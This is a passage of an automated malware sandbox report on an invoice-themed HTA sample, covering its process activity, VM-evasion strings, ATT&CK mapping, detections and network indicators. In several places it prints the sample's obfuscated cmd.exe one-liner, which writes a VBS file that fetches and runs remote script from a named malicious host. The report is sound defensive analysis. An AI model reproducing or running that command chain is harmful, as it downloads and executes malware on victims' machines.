Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Data Obfuscation

Obfuscated command line found

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo\|set /p=^"OwCBGE=".":MwPd="i":Aym5="g":Bzb2EN=":":GetO^">C:\\Users\\Public\\uoxx0.vbs&echo\|set /p=^"bject("sCr"+MwPd+"pt"+Bzb2EN+"hT"+"Tps"+Bzb2EN+"//102"+OwCBGE+"57"+OwCBGE+"205"+OwCBGE+"92"+OwCBGE+"host"+OwCBGE+"secureserver"+OwCBGE+"net//"+Aym5+"1")^">>C:\\Users\\Public\\uoxx0.vbs&c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\uoxx0.vbs
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo\|set /p=^"OwCBGE=".":MwPd="i":Aym5="g":Bzb2EN=":":GetO^">C:\\Users\\Public\\uoxx0.vbs&echo\|set /p=^"bject("sCr"+MwPd+"pt"+Bzb2EN+"hT"+"Tps"+Bzb2EN+"//102"+OwCBGE+"57"+OwCBGE+"205"+OwCBGE+"92"+OwCBGE+"host"+OwCBGE+"secureserver"+OwCBGE+"net//"+Aym5+"1")^">>C:\\Users\\Public\\uoxx0.vbs&c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\uoxx0.vbs			Jump to behavior

Persistence and Installation Behavior

Command shell drops VBS files

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\Public\uoxx0.vbs

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_BIOS

Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: wscript.exe, 00000009.00000002.2067668967.0000000002AC6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.2067188784.0000000002AC5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 0Hyper-V 2008 Beta or RC0BGH9?
Source: wscript.exe, 00000009.00000003.2067188784.0000000002AC5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareFIWIJ*9
Source: wscript.exe, 00000009.00000002.2067668967.0000000002AC6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.2067188784.0000000002AC5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-VFWHN19
Source: wscript.exe, 00000009.00000002.2067668967.0000000002AC6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.2067188784.0000000002AC5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V 2008 R2XGQXGQXGQ
Source: wscript.exe, 00000009.00000002.2067668967.0000000002A57000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.2067668967.0000000002AB4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000009.00000002.2067668967.0000000002A57000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWL
Source: wscript.exe, 00000009.00000003.2067188784.0000000002AC5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: .VMware Virtual PlatformVIQ
Source: wscript.exe, 00000009.00000002.2067668967.0000000002AC6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.2067188784.0000000002AC5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V 2008 RTMMTHMTHM6 w?

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\wscript.exe

Network Connect: 92.205.57.102 443

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo\|set /p=^"OwCBGE=".":MwPd="i":Aym5="g":Bzb2EN=":":GetO^">C:\\Users\\Public\\uoxx0.vbs&echo\|set /p=^"bject("sCr"+MwPd+"pt"+Bzb2EN+"hT"+"Tps"+Bzb2EN+"//102"+OwCBGE+"57"+OwCBGE+"205"+OwCBGE+"92"+OwCBGE+"host"+OwCBGE+"secureserver"+OwCBGE+"net//"+Aym5+"1")^">>C:\\Users\\Public\\uoxx0.vbs&c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\uoxx0.vbs	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set /p="OwCBGE=".":MwPd="i":Aym5="g":Bzb2EN=":":GetO" 1>C:\\Users\\Public\\uoxx0.vbs"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set /p="bject("sCr"+MwPd+"pt"+Bzb2EN+"hT"+"Tps"+Bzb2EN+"//102"+OwCBGE+"57"+OwCBGE+"205"+OwCBGE+"92"+OwCBGE+"host"+OwCBGE+"secureserver"+OwCBGE+"net//"+Aym5+"1")" 1>>C:\\Users\\Public\\uoxx0.vbs"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\uoxx0.vbs	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\uoxx0.vbs"	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /k echo\|set /p=^"owcbge=".":mwpd="i":aym5="g":bzb2en=":":geto^">c:\\users\\public\\uoxx0.vbs&echo\|set /p=^"bject("scr"+mwpd+"pt"+bzb2en+"ht"+"tps"+bzb2en+"//102"+owcbge+"57"+owcbge+"205"+owcbge+"92"+owcbge+"host"+owcbge+"secureserver"+owcbge+"net//"+aym5+"1")^">>c:\\users\\public\\uoxx0.vbs&c:\\windows\\system32\\cmd.exe /c start c:\\users\\public\\uoxx0.vbs
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /k echo\|set /p=^"owcbge=".":mwpd="i":aym5="g":bzb2en=":":geto^">c:\\users\\public\\uoxx0.vbs&echo\|set /p=^"bject("scr"+mwpd+"pt"+bzb2en+"ht"+"tps"+bzb2en+"//102"+owcbge+"57"+owcbge+"205"+owcbge+"92"+owcbge+"host"+owcbge+"secureserver"+owcbge+"net//"+aym5+"1")^">>c:\\users\\public\\uoxx0.vbs&c:\\windows\\system32\\cmd.exe /c start c:\\users\\public\\uoxx0.vbs			Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	Valid Accounts	2 Windows Management Instrumentation	111 Scripting	111 Process Injection	1 Masquerading	OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Command and Scripting Interpreter	1 DLL Side-Loading	1 DLL Side-Loading	1 Virtualization/Sandbox Evasion	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	111 Process Injection	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	33 System Information Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Factura - XwgyvMuOAO.hta	26%	ReversingLabs	Script-JS.Packed.Generic

Source	Detection	Scanner	Label
https://102.57.205.92.host.secureserver.net/g1/1	100%	Avira URL Cloud	malware
https://102.57.205.92.host.secureserver.net/	100%	Avira URL Cloud	malware
https://102.57.205.92.host.secureserver.net/jgseaHOSHOSHO	100%	Avira URL Cloud	malware
https://102.57.205.92.host.secureserver.net/g1/J	100%	Avira URL Cloud	malware
hTTps://102.57.205.92.hostC	0%	Avira URL Cloud	safe
https://102.57.205.92.host.secureserver.net//g1	100%	Avira URL Cloud	malware
hTTps://102.57.205.92.host.secureserverM2	0%	Avira URL Cloud	safe
https://102.57.205.92.host.secureserver.net//g1Q	100%	Avira URL Cloud	malware
hTTps://102.57.205	0%	Avira URL Cloud	safe
hTTps://102.57.205.92.host.secureserver.net//	100%	Avira URL Cloud	malware
hTTps://102.57.205.92.host.	0%	Avira URL Cloud	safe
hTTps://102.57.205.92.	0%	Avira URL Cloud	safe
hTTps://102.57.205.92	0%	Avira URL Cloud	safe
hTTps://102.5701	0%	Avira URL Cloud	safe
https://102.57.205.92.host.secureserver.net/g1/e	100%	Avira URL Cloud	malware
hTTps://102.57.205.	0%	Avira URL Cloud	safe
https://102.57.205.92.host.secureserver.net/g1/B	100%	Avira URL Cloud	malware
https://102.57.205.92.host.secureserver.net/QKFQKFQKFQKFQKFQKFQKFQKFQKFQKFQFQICQICQIC	100%	Avira URL Cloud	malware
hTTps://102.57.graphy	0%	Avira URL Cloud	safe
hTTps://102.57.205.92.host.secureserver.net//g	100%	Avira URL Cloud	malware
https://102.57.205.92.host.secureserver.net/g1/	100%	Avira URL Cloud	malware
hTTps://102.57.205.92.host.secureserver.	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
102.57.205.92.host.secureserver.net	92.205.57.102	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://102.57.205.92.host.secureserver.net//g1	true	Avira URL Cloud: malware	unknown
https://102.57.205.92.host.secureserver.net/g1/	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://102.57.205.92.host.secureserver.net/jgseaHOSHOSHO	wscript.exe, 00000009.00000002.2067668967.0000000002A9B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
hTTps://102.57.205	wscript.exe, 00000009.00000002.2067668967.0000000002A57000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://102.57.205.92.host.secureserver.net/g1/1	wscript.exe, 00000009.00000003.2052587425.0000000002ACE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.2063537527.0000000002ACE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
hTTps://102.57.205.92.hostC	wscript.exe, 00000009.00000002.2067668967.0000000002A57000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://102.57.205.92.host.secureserver.net//g1Q	wscript.exe, 00000009.00000002.2067668967.0000000002A9B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
hTTps://102.57.205.92.host.secureserver.net//	wscript.exe, 00000009.00000002.2067668967.0000000002A57000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://102.57.205.92.host.secureserver.net/	wscript.exe, 00000009.00000002.2067668967.0000000002A9B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
hTTps://102.57.205.92.host.secureserverM2	wscript.exe, 00000009.00000002.2067668967.0000000002A57000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://102.57.205.92.host.secureserver.net/g1/J	wscript.exe, 00000009.00000003.2063537527.0000000002ACE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
hTTps://102.57.205.92.	wscript.exe, 00000009.00000002.2067668967.0000000002A57000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://102.57.205.92.host.secureserver.net/g1/e	wscript.exe, 00000009.00000002.2067668967.0000000002A9B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
hTTps://102.5701	wscript.exe, 00000009.00000002.2067668967.0000000002A57000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
hTTps://102.57.205.92.host.	wscript.exe, 00000009.00000002.2067668967.0000000002A57000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
hTTps://102.57.205.92.host.secureserver.net//g	wscript.exe, 00000009.00000002.2067668967.0000000002A57000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://102.57.205.92.host.secureserver.net/g1/B	wscript.exe, 00000009.00000002.2067668967.0000000002A9B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
hTTps://102.57.205.92.host.secureserver.net//g1	wscript.exe, 00000009.00000002.2067668967.0000000002A57000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://102.57.205.92.host.secureserver.net/QKFQKFQKFQKFQKFQKFQKFQKFQKFQKFQFQICQICQIC	wscript.exe, 00000009.00000002.2067668967.0000000002AC6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.2067188784.0000000002AC5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
hTTps://102.57.205.	wscript.exe, 00000009.00000002.2067668967.0000000002A57000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
hTTps://102.57.graphy	wscript.exe, 00000009.00000002.2067668967.0000000002A38000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
hTTps://102.57.205.92	wscript.exe, 00000009.00000002.2067668967.0000000002A57000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
hTTps://102.57.205.92.host.secureserver.	wscript.exe, 00000009.00000002.2067668967.0000000002A57000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
92.205.57.102	102.57.205.92.host.secureserver.net	Germany		8972	GD-EMEA-DC-SXB1DE	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1493145
Start date and time:	2024-08-15 00:57:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 19s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Factura - XwgyvMuOAO.hta
Detection:	MAL
Classification:	mal96.evad.winHTA@17/3@1/1
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 3 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .hta

Warnings

Exclude process from analysis (whitelisted): WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target mshta.exe, PID 3788 because there are no executed function
Execution Graph export aborted for target wscript.exe, PID 2220 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: Factura - XwgyvMuOAO.hta

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
GD-EMEA-DC-SXB1DE	http://www.GMCCorsehill.co.uk	Get hash	malicious	Unknown	Browse	92.205.170.174
	sora.sh4.elf	Get hash	malicious	Mirai	Browse	188.139.32.243
	https://mgmsoftair.com/modules/simpleimportproduct/fire.html#chaewoo.park@hyundaielevator.com	Get hash	malicious	HTMLPhisher	Browse	92.204.53.252
	3AV1PyEQ16.elf	Get hash	malicious	Unknown	Browse	46.163.111.242
	b2bXo6vmDm.exe	Get hash	malicious	SystemBC	Browse	92.205.13.202
	file.exe	Get hash	malicious	SystemBC	Browse	92.205.13.202
	file.exe	Get hash	malicious	SystemBC	Browse	80.67.29.4
	LisectAVT_2403002B_59.dll	Get hash	malicious	Emotet	Browse	85.25.120.45
	LisectAVT_2403002C_119.exe	Get hash	malicious	Bdaejec, Sodinokibi	Browse	5.175.14.247
	LisectAVT_2403002C_62.dll	Get hash	malicious	Emotet	Browse	83.169.21.32

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	z9T__VAUSTRIATURK-TEKL__F.exe	Get hash	malicious	FormBook, GuLoader	Browse	92.205.57.102
	z1_____________.exe	Get hash	malicious	FormBook, GuLoader	Browse	92.205.57.102
	PDFixers.exe	Get hash	malicious	Unknown	Browse	92.205.57.102
	55892.vbs	Get hash	malicious	FormBook, GuLoader	Browse	92.205.57.102
	WKORlhj1t7.exe	Get hash	malicious	Unknown	Browse	92.205.57.102
	8Pua5fRt67.exe	Get hash	malicious	Unknown	Browse	92.205.57.102
	jvXkaS2YTX.exe	Get hash	malicious	Unknown	Browse	92.205.57.102
	file.exe	Get hash	malicious	Unknown	Browse	92.205.57.102
	sihost.exe	Get hash	malicious	GuLoader	Browse	92.205.57.102
	C0XWmZAnYk.exe	Get hash	malicious	Babuk, Djvu	Browse	92.205.57.102

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with no line terminators
Category:	modified
Size (bytes):	196
Entropy (8bit):	4.743758269240463
Encrypted:	false
SSDEEP:	3:IuzAS1uHGMcIVC/vXXC084GRnJm+oNxHshuoRMvonOpQoFQlVodQot/onXzAX+NZ:3xK5VC/vNfwJ389AOpjCOdjtQcX10rHp
MD5:	485C2046DF0739BADDEEB7BF708817FE
SHA1:	9018871ECE360C4AF31B7F598D486BFE66E197BD
SHA-256:	7B76160A0F32E6C9B3E2C7971791102BB3FDBBE284059CF2D3554504D1C89D18
SHA-512:	D5E04E9E98AF5E137BFE7CEC9532BD238620F16890F9C435A0DB8B863F2B6C7EA3012A9DE65EA56B286CBD2BEE150A1A2870426B8C62E488C48D1AD4DA42B60E
Malicious:	true
Reputation:	low
Preview:	OwCBGE=".":MwPd="i":Aym5="g":Bzb2EN=":":GetObject("sCr"+MwPd+"pt"+Bzb2EN+"hT"+"Tps"+Bzb2EN+"//102"+OwCBGE+"57"+OwCBGE+"205"+OwCBGE+"92"+OwCBGE+"host"+OwCBGE+"secureserver"+OwCBGE+"net//"+Aym5+"1")

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\g1[1].txt

Download File

Process:	C:\Windows\SysWOW64\wscript.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (2993), with CRLF line terminators
Category:	dropped
Size (bytes):	25760
Entropy (8bit):	5.917394427727027
Encrypted:	false
SSDEEP:	384:EkxQpkVWgD0tFCx/n7yXG888Yd3NMthzY82m5ZZsk3zpoAqaLpNlTbvfD3H:ZxM+/2XG7Mthf2E9CkNJD3
MD5:	1E7281E92D2BEA201B60EC3F8CC272A7
SHA1:	362C0BF7944FA925E5E5F1F72FA1CA9426DD6CD2
SHA-256:	B60BD924EF1844CE68DED617FB9D7F72894F6CD5CEB2D526C05356DBC4AB2BCD
SHA-512:	7F7CD853046E73CEA5FEC4BB59AEB5439AEB1AB9A5FFA848508001E931B84E7F13F4C60956FCD589FD28DEA94E51CDE85CBE07370FD387958C5D3BFE1D5E8F5A
Malicious:	false
Reputation:	low
